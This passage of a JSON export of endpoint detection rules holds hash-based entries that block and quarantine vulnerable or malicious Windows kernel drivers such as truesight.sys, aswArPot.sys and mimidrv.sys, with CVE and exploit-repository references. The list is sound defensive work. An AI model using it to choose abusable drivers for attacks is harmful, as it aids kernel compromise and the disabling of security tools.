"001cd8b2ce1932d1a8c32bc2d643ee4fa6f67626d1b6895beea916285450566c", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb0cbf95-c47e-5840-bfba-a5747914b40b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822078Z", + "creation_date": "2026-03-23T11:45:31.822082Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822090Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74020c03e63a367cf16e08644a2f7427704312c219c3d7b8f84c549059bfddb0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb13ceb8-daed-5eb1-9fdb-217983682499", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480674Z", + "creation_date": "2026-03-23T11:45:30.480677Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480686Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fc23abdcf93928e1db8401a7ff53c86c85230a8637c4168f7434208f9e8b5ded", + "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb13d187-132c-5349-b65d-717b4c7828e3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159517Z", + "creation_date": "2026-03-23T11:45:31.159519Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159525Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8e3627239b09b34f1fc404f536b1599e3d27eecdac4c14129f7babeea25214ea", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb1e75f5-b6fb-57a0-b769-4ed7be50140d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984711Z", + "creation_date": "2026-03-23T11:45:29.984713Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984719Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4", + "comment": "Dangerous Physmem Kernel Driver (aka asmmap.Sys) [https://www.loldrivers.io/drivers/d0048840-970f-4ad5-9a07-1d39469d721f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb262c08-cfb5-561e-82ef-98ecb723d25f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.969751Z", + "creation_date": "2026-03-23T11:45:29.969753Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969758Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "29a560a11292c4224a401392e091a8f08230fdfea35521035e2bfda0b3d1f952", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb26968d-afdf-5fc3-997c-c7e49f5817d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825504Z", + "creation_date": "2026-03-23T11:45:30.825506Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825511Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "157f9f36041dbc09548cd87687995d9e8b9b30a80fc7e9bad6d8cfa943489d3a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb2e5d51-f2ef-503a-8c98-1cdd3094481d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621106Z", + "creation_date": "2026-03-23T11:45:29.621108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621114Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "119c48b79735fda0ecd973d77d9bdc6b329960caed09b38ab454236ca039d280", + "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb381b37-eb0f-56f0-8ab0-f3ff9a1fa717", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.835628Z", + "creation_date": "2026-03-23T11:45:30.835630Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.835636Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fcf3456fa90bdac43a1f4c63fcfd9a8ad3b3a404a8c0f6a1a399a671d4a52ae5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb3c0b66-a239-59dd-8613-d33b8ec70ebf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826336Z", + "creation_date": "2026-03-23T11:45:30.826338Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826343Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6ac5a594db3b536fe6b74f54a09055428fcefc2e9cf19124a910fc0e322ee0a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb4fbb14-b40a-514e-84ba-c314b653152e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969541Z", + "creation_date": "2026-03-23T11:45:29.969543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969548Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2bfad74a63ad223656a3b27fb3edc92bbef7dce431ccdb835d3cbae6a08a08f5", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb53ed46-1d61-5c0c-b0e3-e29d7a0db0ec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488969Z", + "creation_date": "2026-03-23T11:45:31.488971Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488976Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "7e987f8edeb917dbc06d1756d09ea983697e7062dfe33f34cae2183c22fae5bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb59b217-adf2-575f-9b86-9f84430f0332", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498091Z", + "creation_date": "2026-03-23T11:45:31.498095Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498103Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ca08a2401b1ddb538b7883cee05360ecac816b0dc17a822fc23d6d05d6c1a0a2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb5f708c-83df-5e62-ba3f-ab4a718570b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146378Z", + "creation_date": "2026-03-23T11:45:32.146380Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146385Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3b12d9f35f9acd46d7e21627ad3e29149d203e211d665a3e03103f9cb7e4b86", + "comment": "Vulnerable Kernel Driver (aka wsftprm.sys) [https://www.loldrivers.io/drivers/30e8d598-2c60-49e4-953b-a6f620da1371/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb5ff984-80b7-5b80-b6ae-0c3f11051500", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807254Z", + "creation_date": "2026-03-23T11:45:31.807270Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807283Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1264becef907f7f33e8ba9106375e7c902b8835e58b10f9b54a54c2de7db2e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb777081-0212-53e9-a817-97a8f87223da", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822709Z", + "creation_date": "2026-03-23T11:45:31.822712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a04658d24014cde98165b44854d4d64b0fc908bc20d6ab3c8d89fef31b48661", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb77fda6-5e02-5a98-82b5-b47380399b4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.469162Z", + "creation_date": "2026-03-23T11:45:30.469165Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.469174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2dd2620e1c844738429ba31e2545a8b2de1387117e4f24d6fe7fd4246b09ac39", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb823228-c5ff-5ed2-ac22-b3d76613c9df", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830052Z", + "creation_date": "2026-03-23T11:45:31.830054Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830059Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "edacedc3c79728d1958506890c461ff0cd15735309a26cbe4308befbf527c23d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + 
"id": "bb83c7c0-829e-5cd5-aa39-08fd9a7c785d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464034Z", + "creation_date": "2026-03-23T11:45:30.464037Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464046Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d37996abc8efb29f1ccbb4335ce9ba9158bec86cc4775f0177112e87e4e3be5c", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb845f78-6d05-5590-9971-bad3cdbd7a3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141733Z", + "creation_date": "2026-03-23T11:45:31.141735Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141740Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "702fcd3be8e060e1aa22b9854e14bcf312425c388c2ce9185cd082430c555e9b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bb999384-d931-596b-b79a-1b771f337164", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830473Z", + "creation_date": "2026-03-23T11:45:30.830475Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830481Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47dd83a8770fc755c1cc0440ef1baa1e262b03a774f200276b1b82ae5b7ed4f7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bbb09f38-bb2a-5a74-b1ad-be76aa2c6f93", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815309Z", + "creation_date": "2026-03-23T11:45:31.815310Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815316Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cdfa1c5aade70879639bcfd4f08ab909d0e7479e74817f42a4af2d49d80b5f85", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bbb88b8c-e5fe-5482-ba8f-01073e71b7a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833643Z", + "creation_date": "2026-03-23T11:45:30.833647Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "28124094439a1fb9a8988bcfb37bd02f21988c4a74ecd8f869466102cc3d2bf5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bbb8fde8-3eb9-588a-b63d-b434b6101cfa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608777Z", + "creation_date": "2026-03-23T11:45:29.608779Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608784Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a5a2fe8ab935cf47f21e0c5e0de11a98271054109827dc930293b947d3b05079", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bbdabf3e-4a4d-574c-811b-af696ffa7630", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621193Z", + "creation_date": "2026-03-23T11:45:29.621195Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621202Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d3966edd6b2291aad8ce21f35f85ea18a60e5c382891809bf4d4e07d0b0c61a8", + "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bbde88ba-f337-5cd1-b29d-272203753854", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 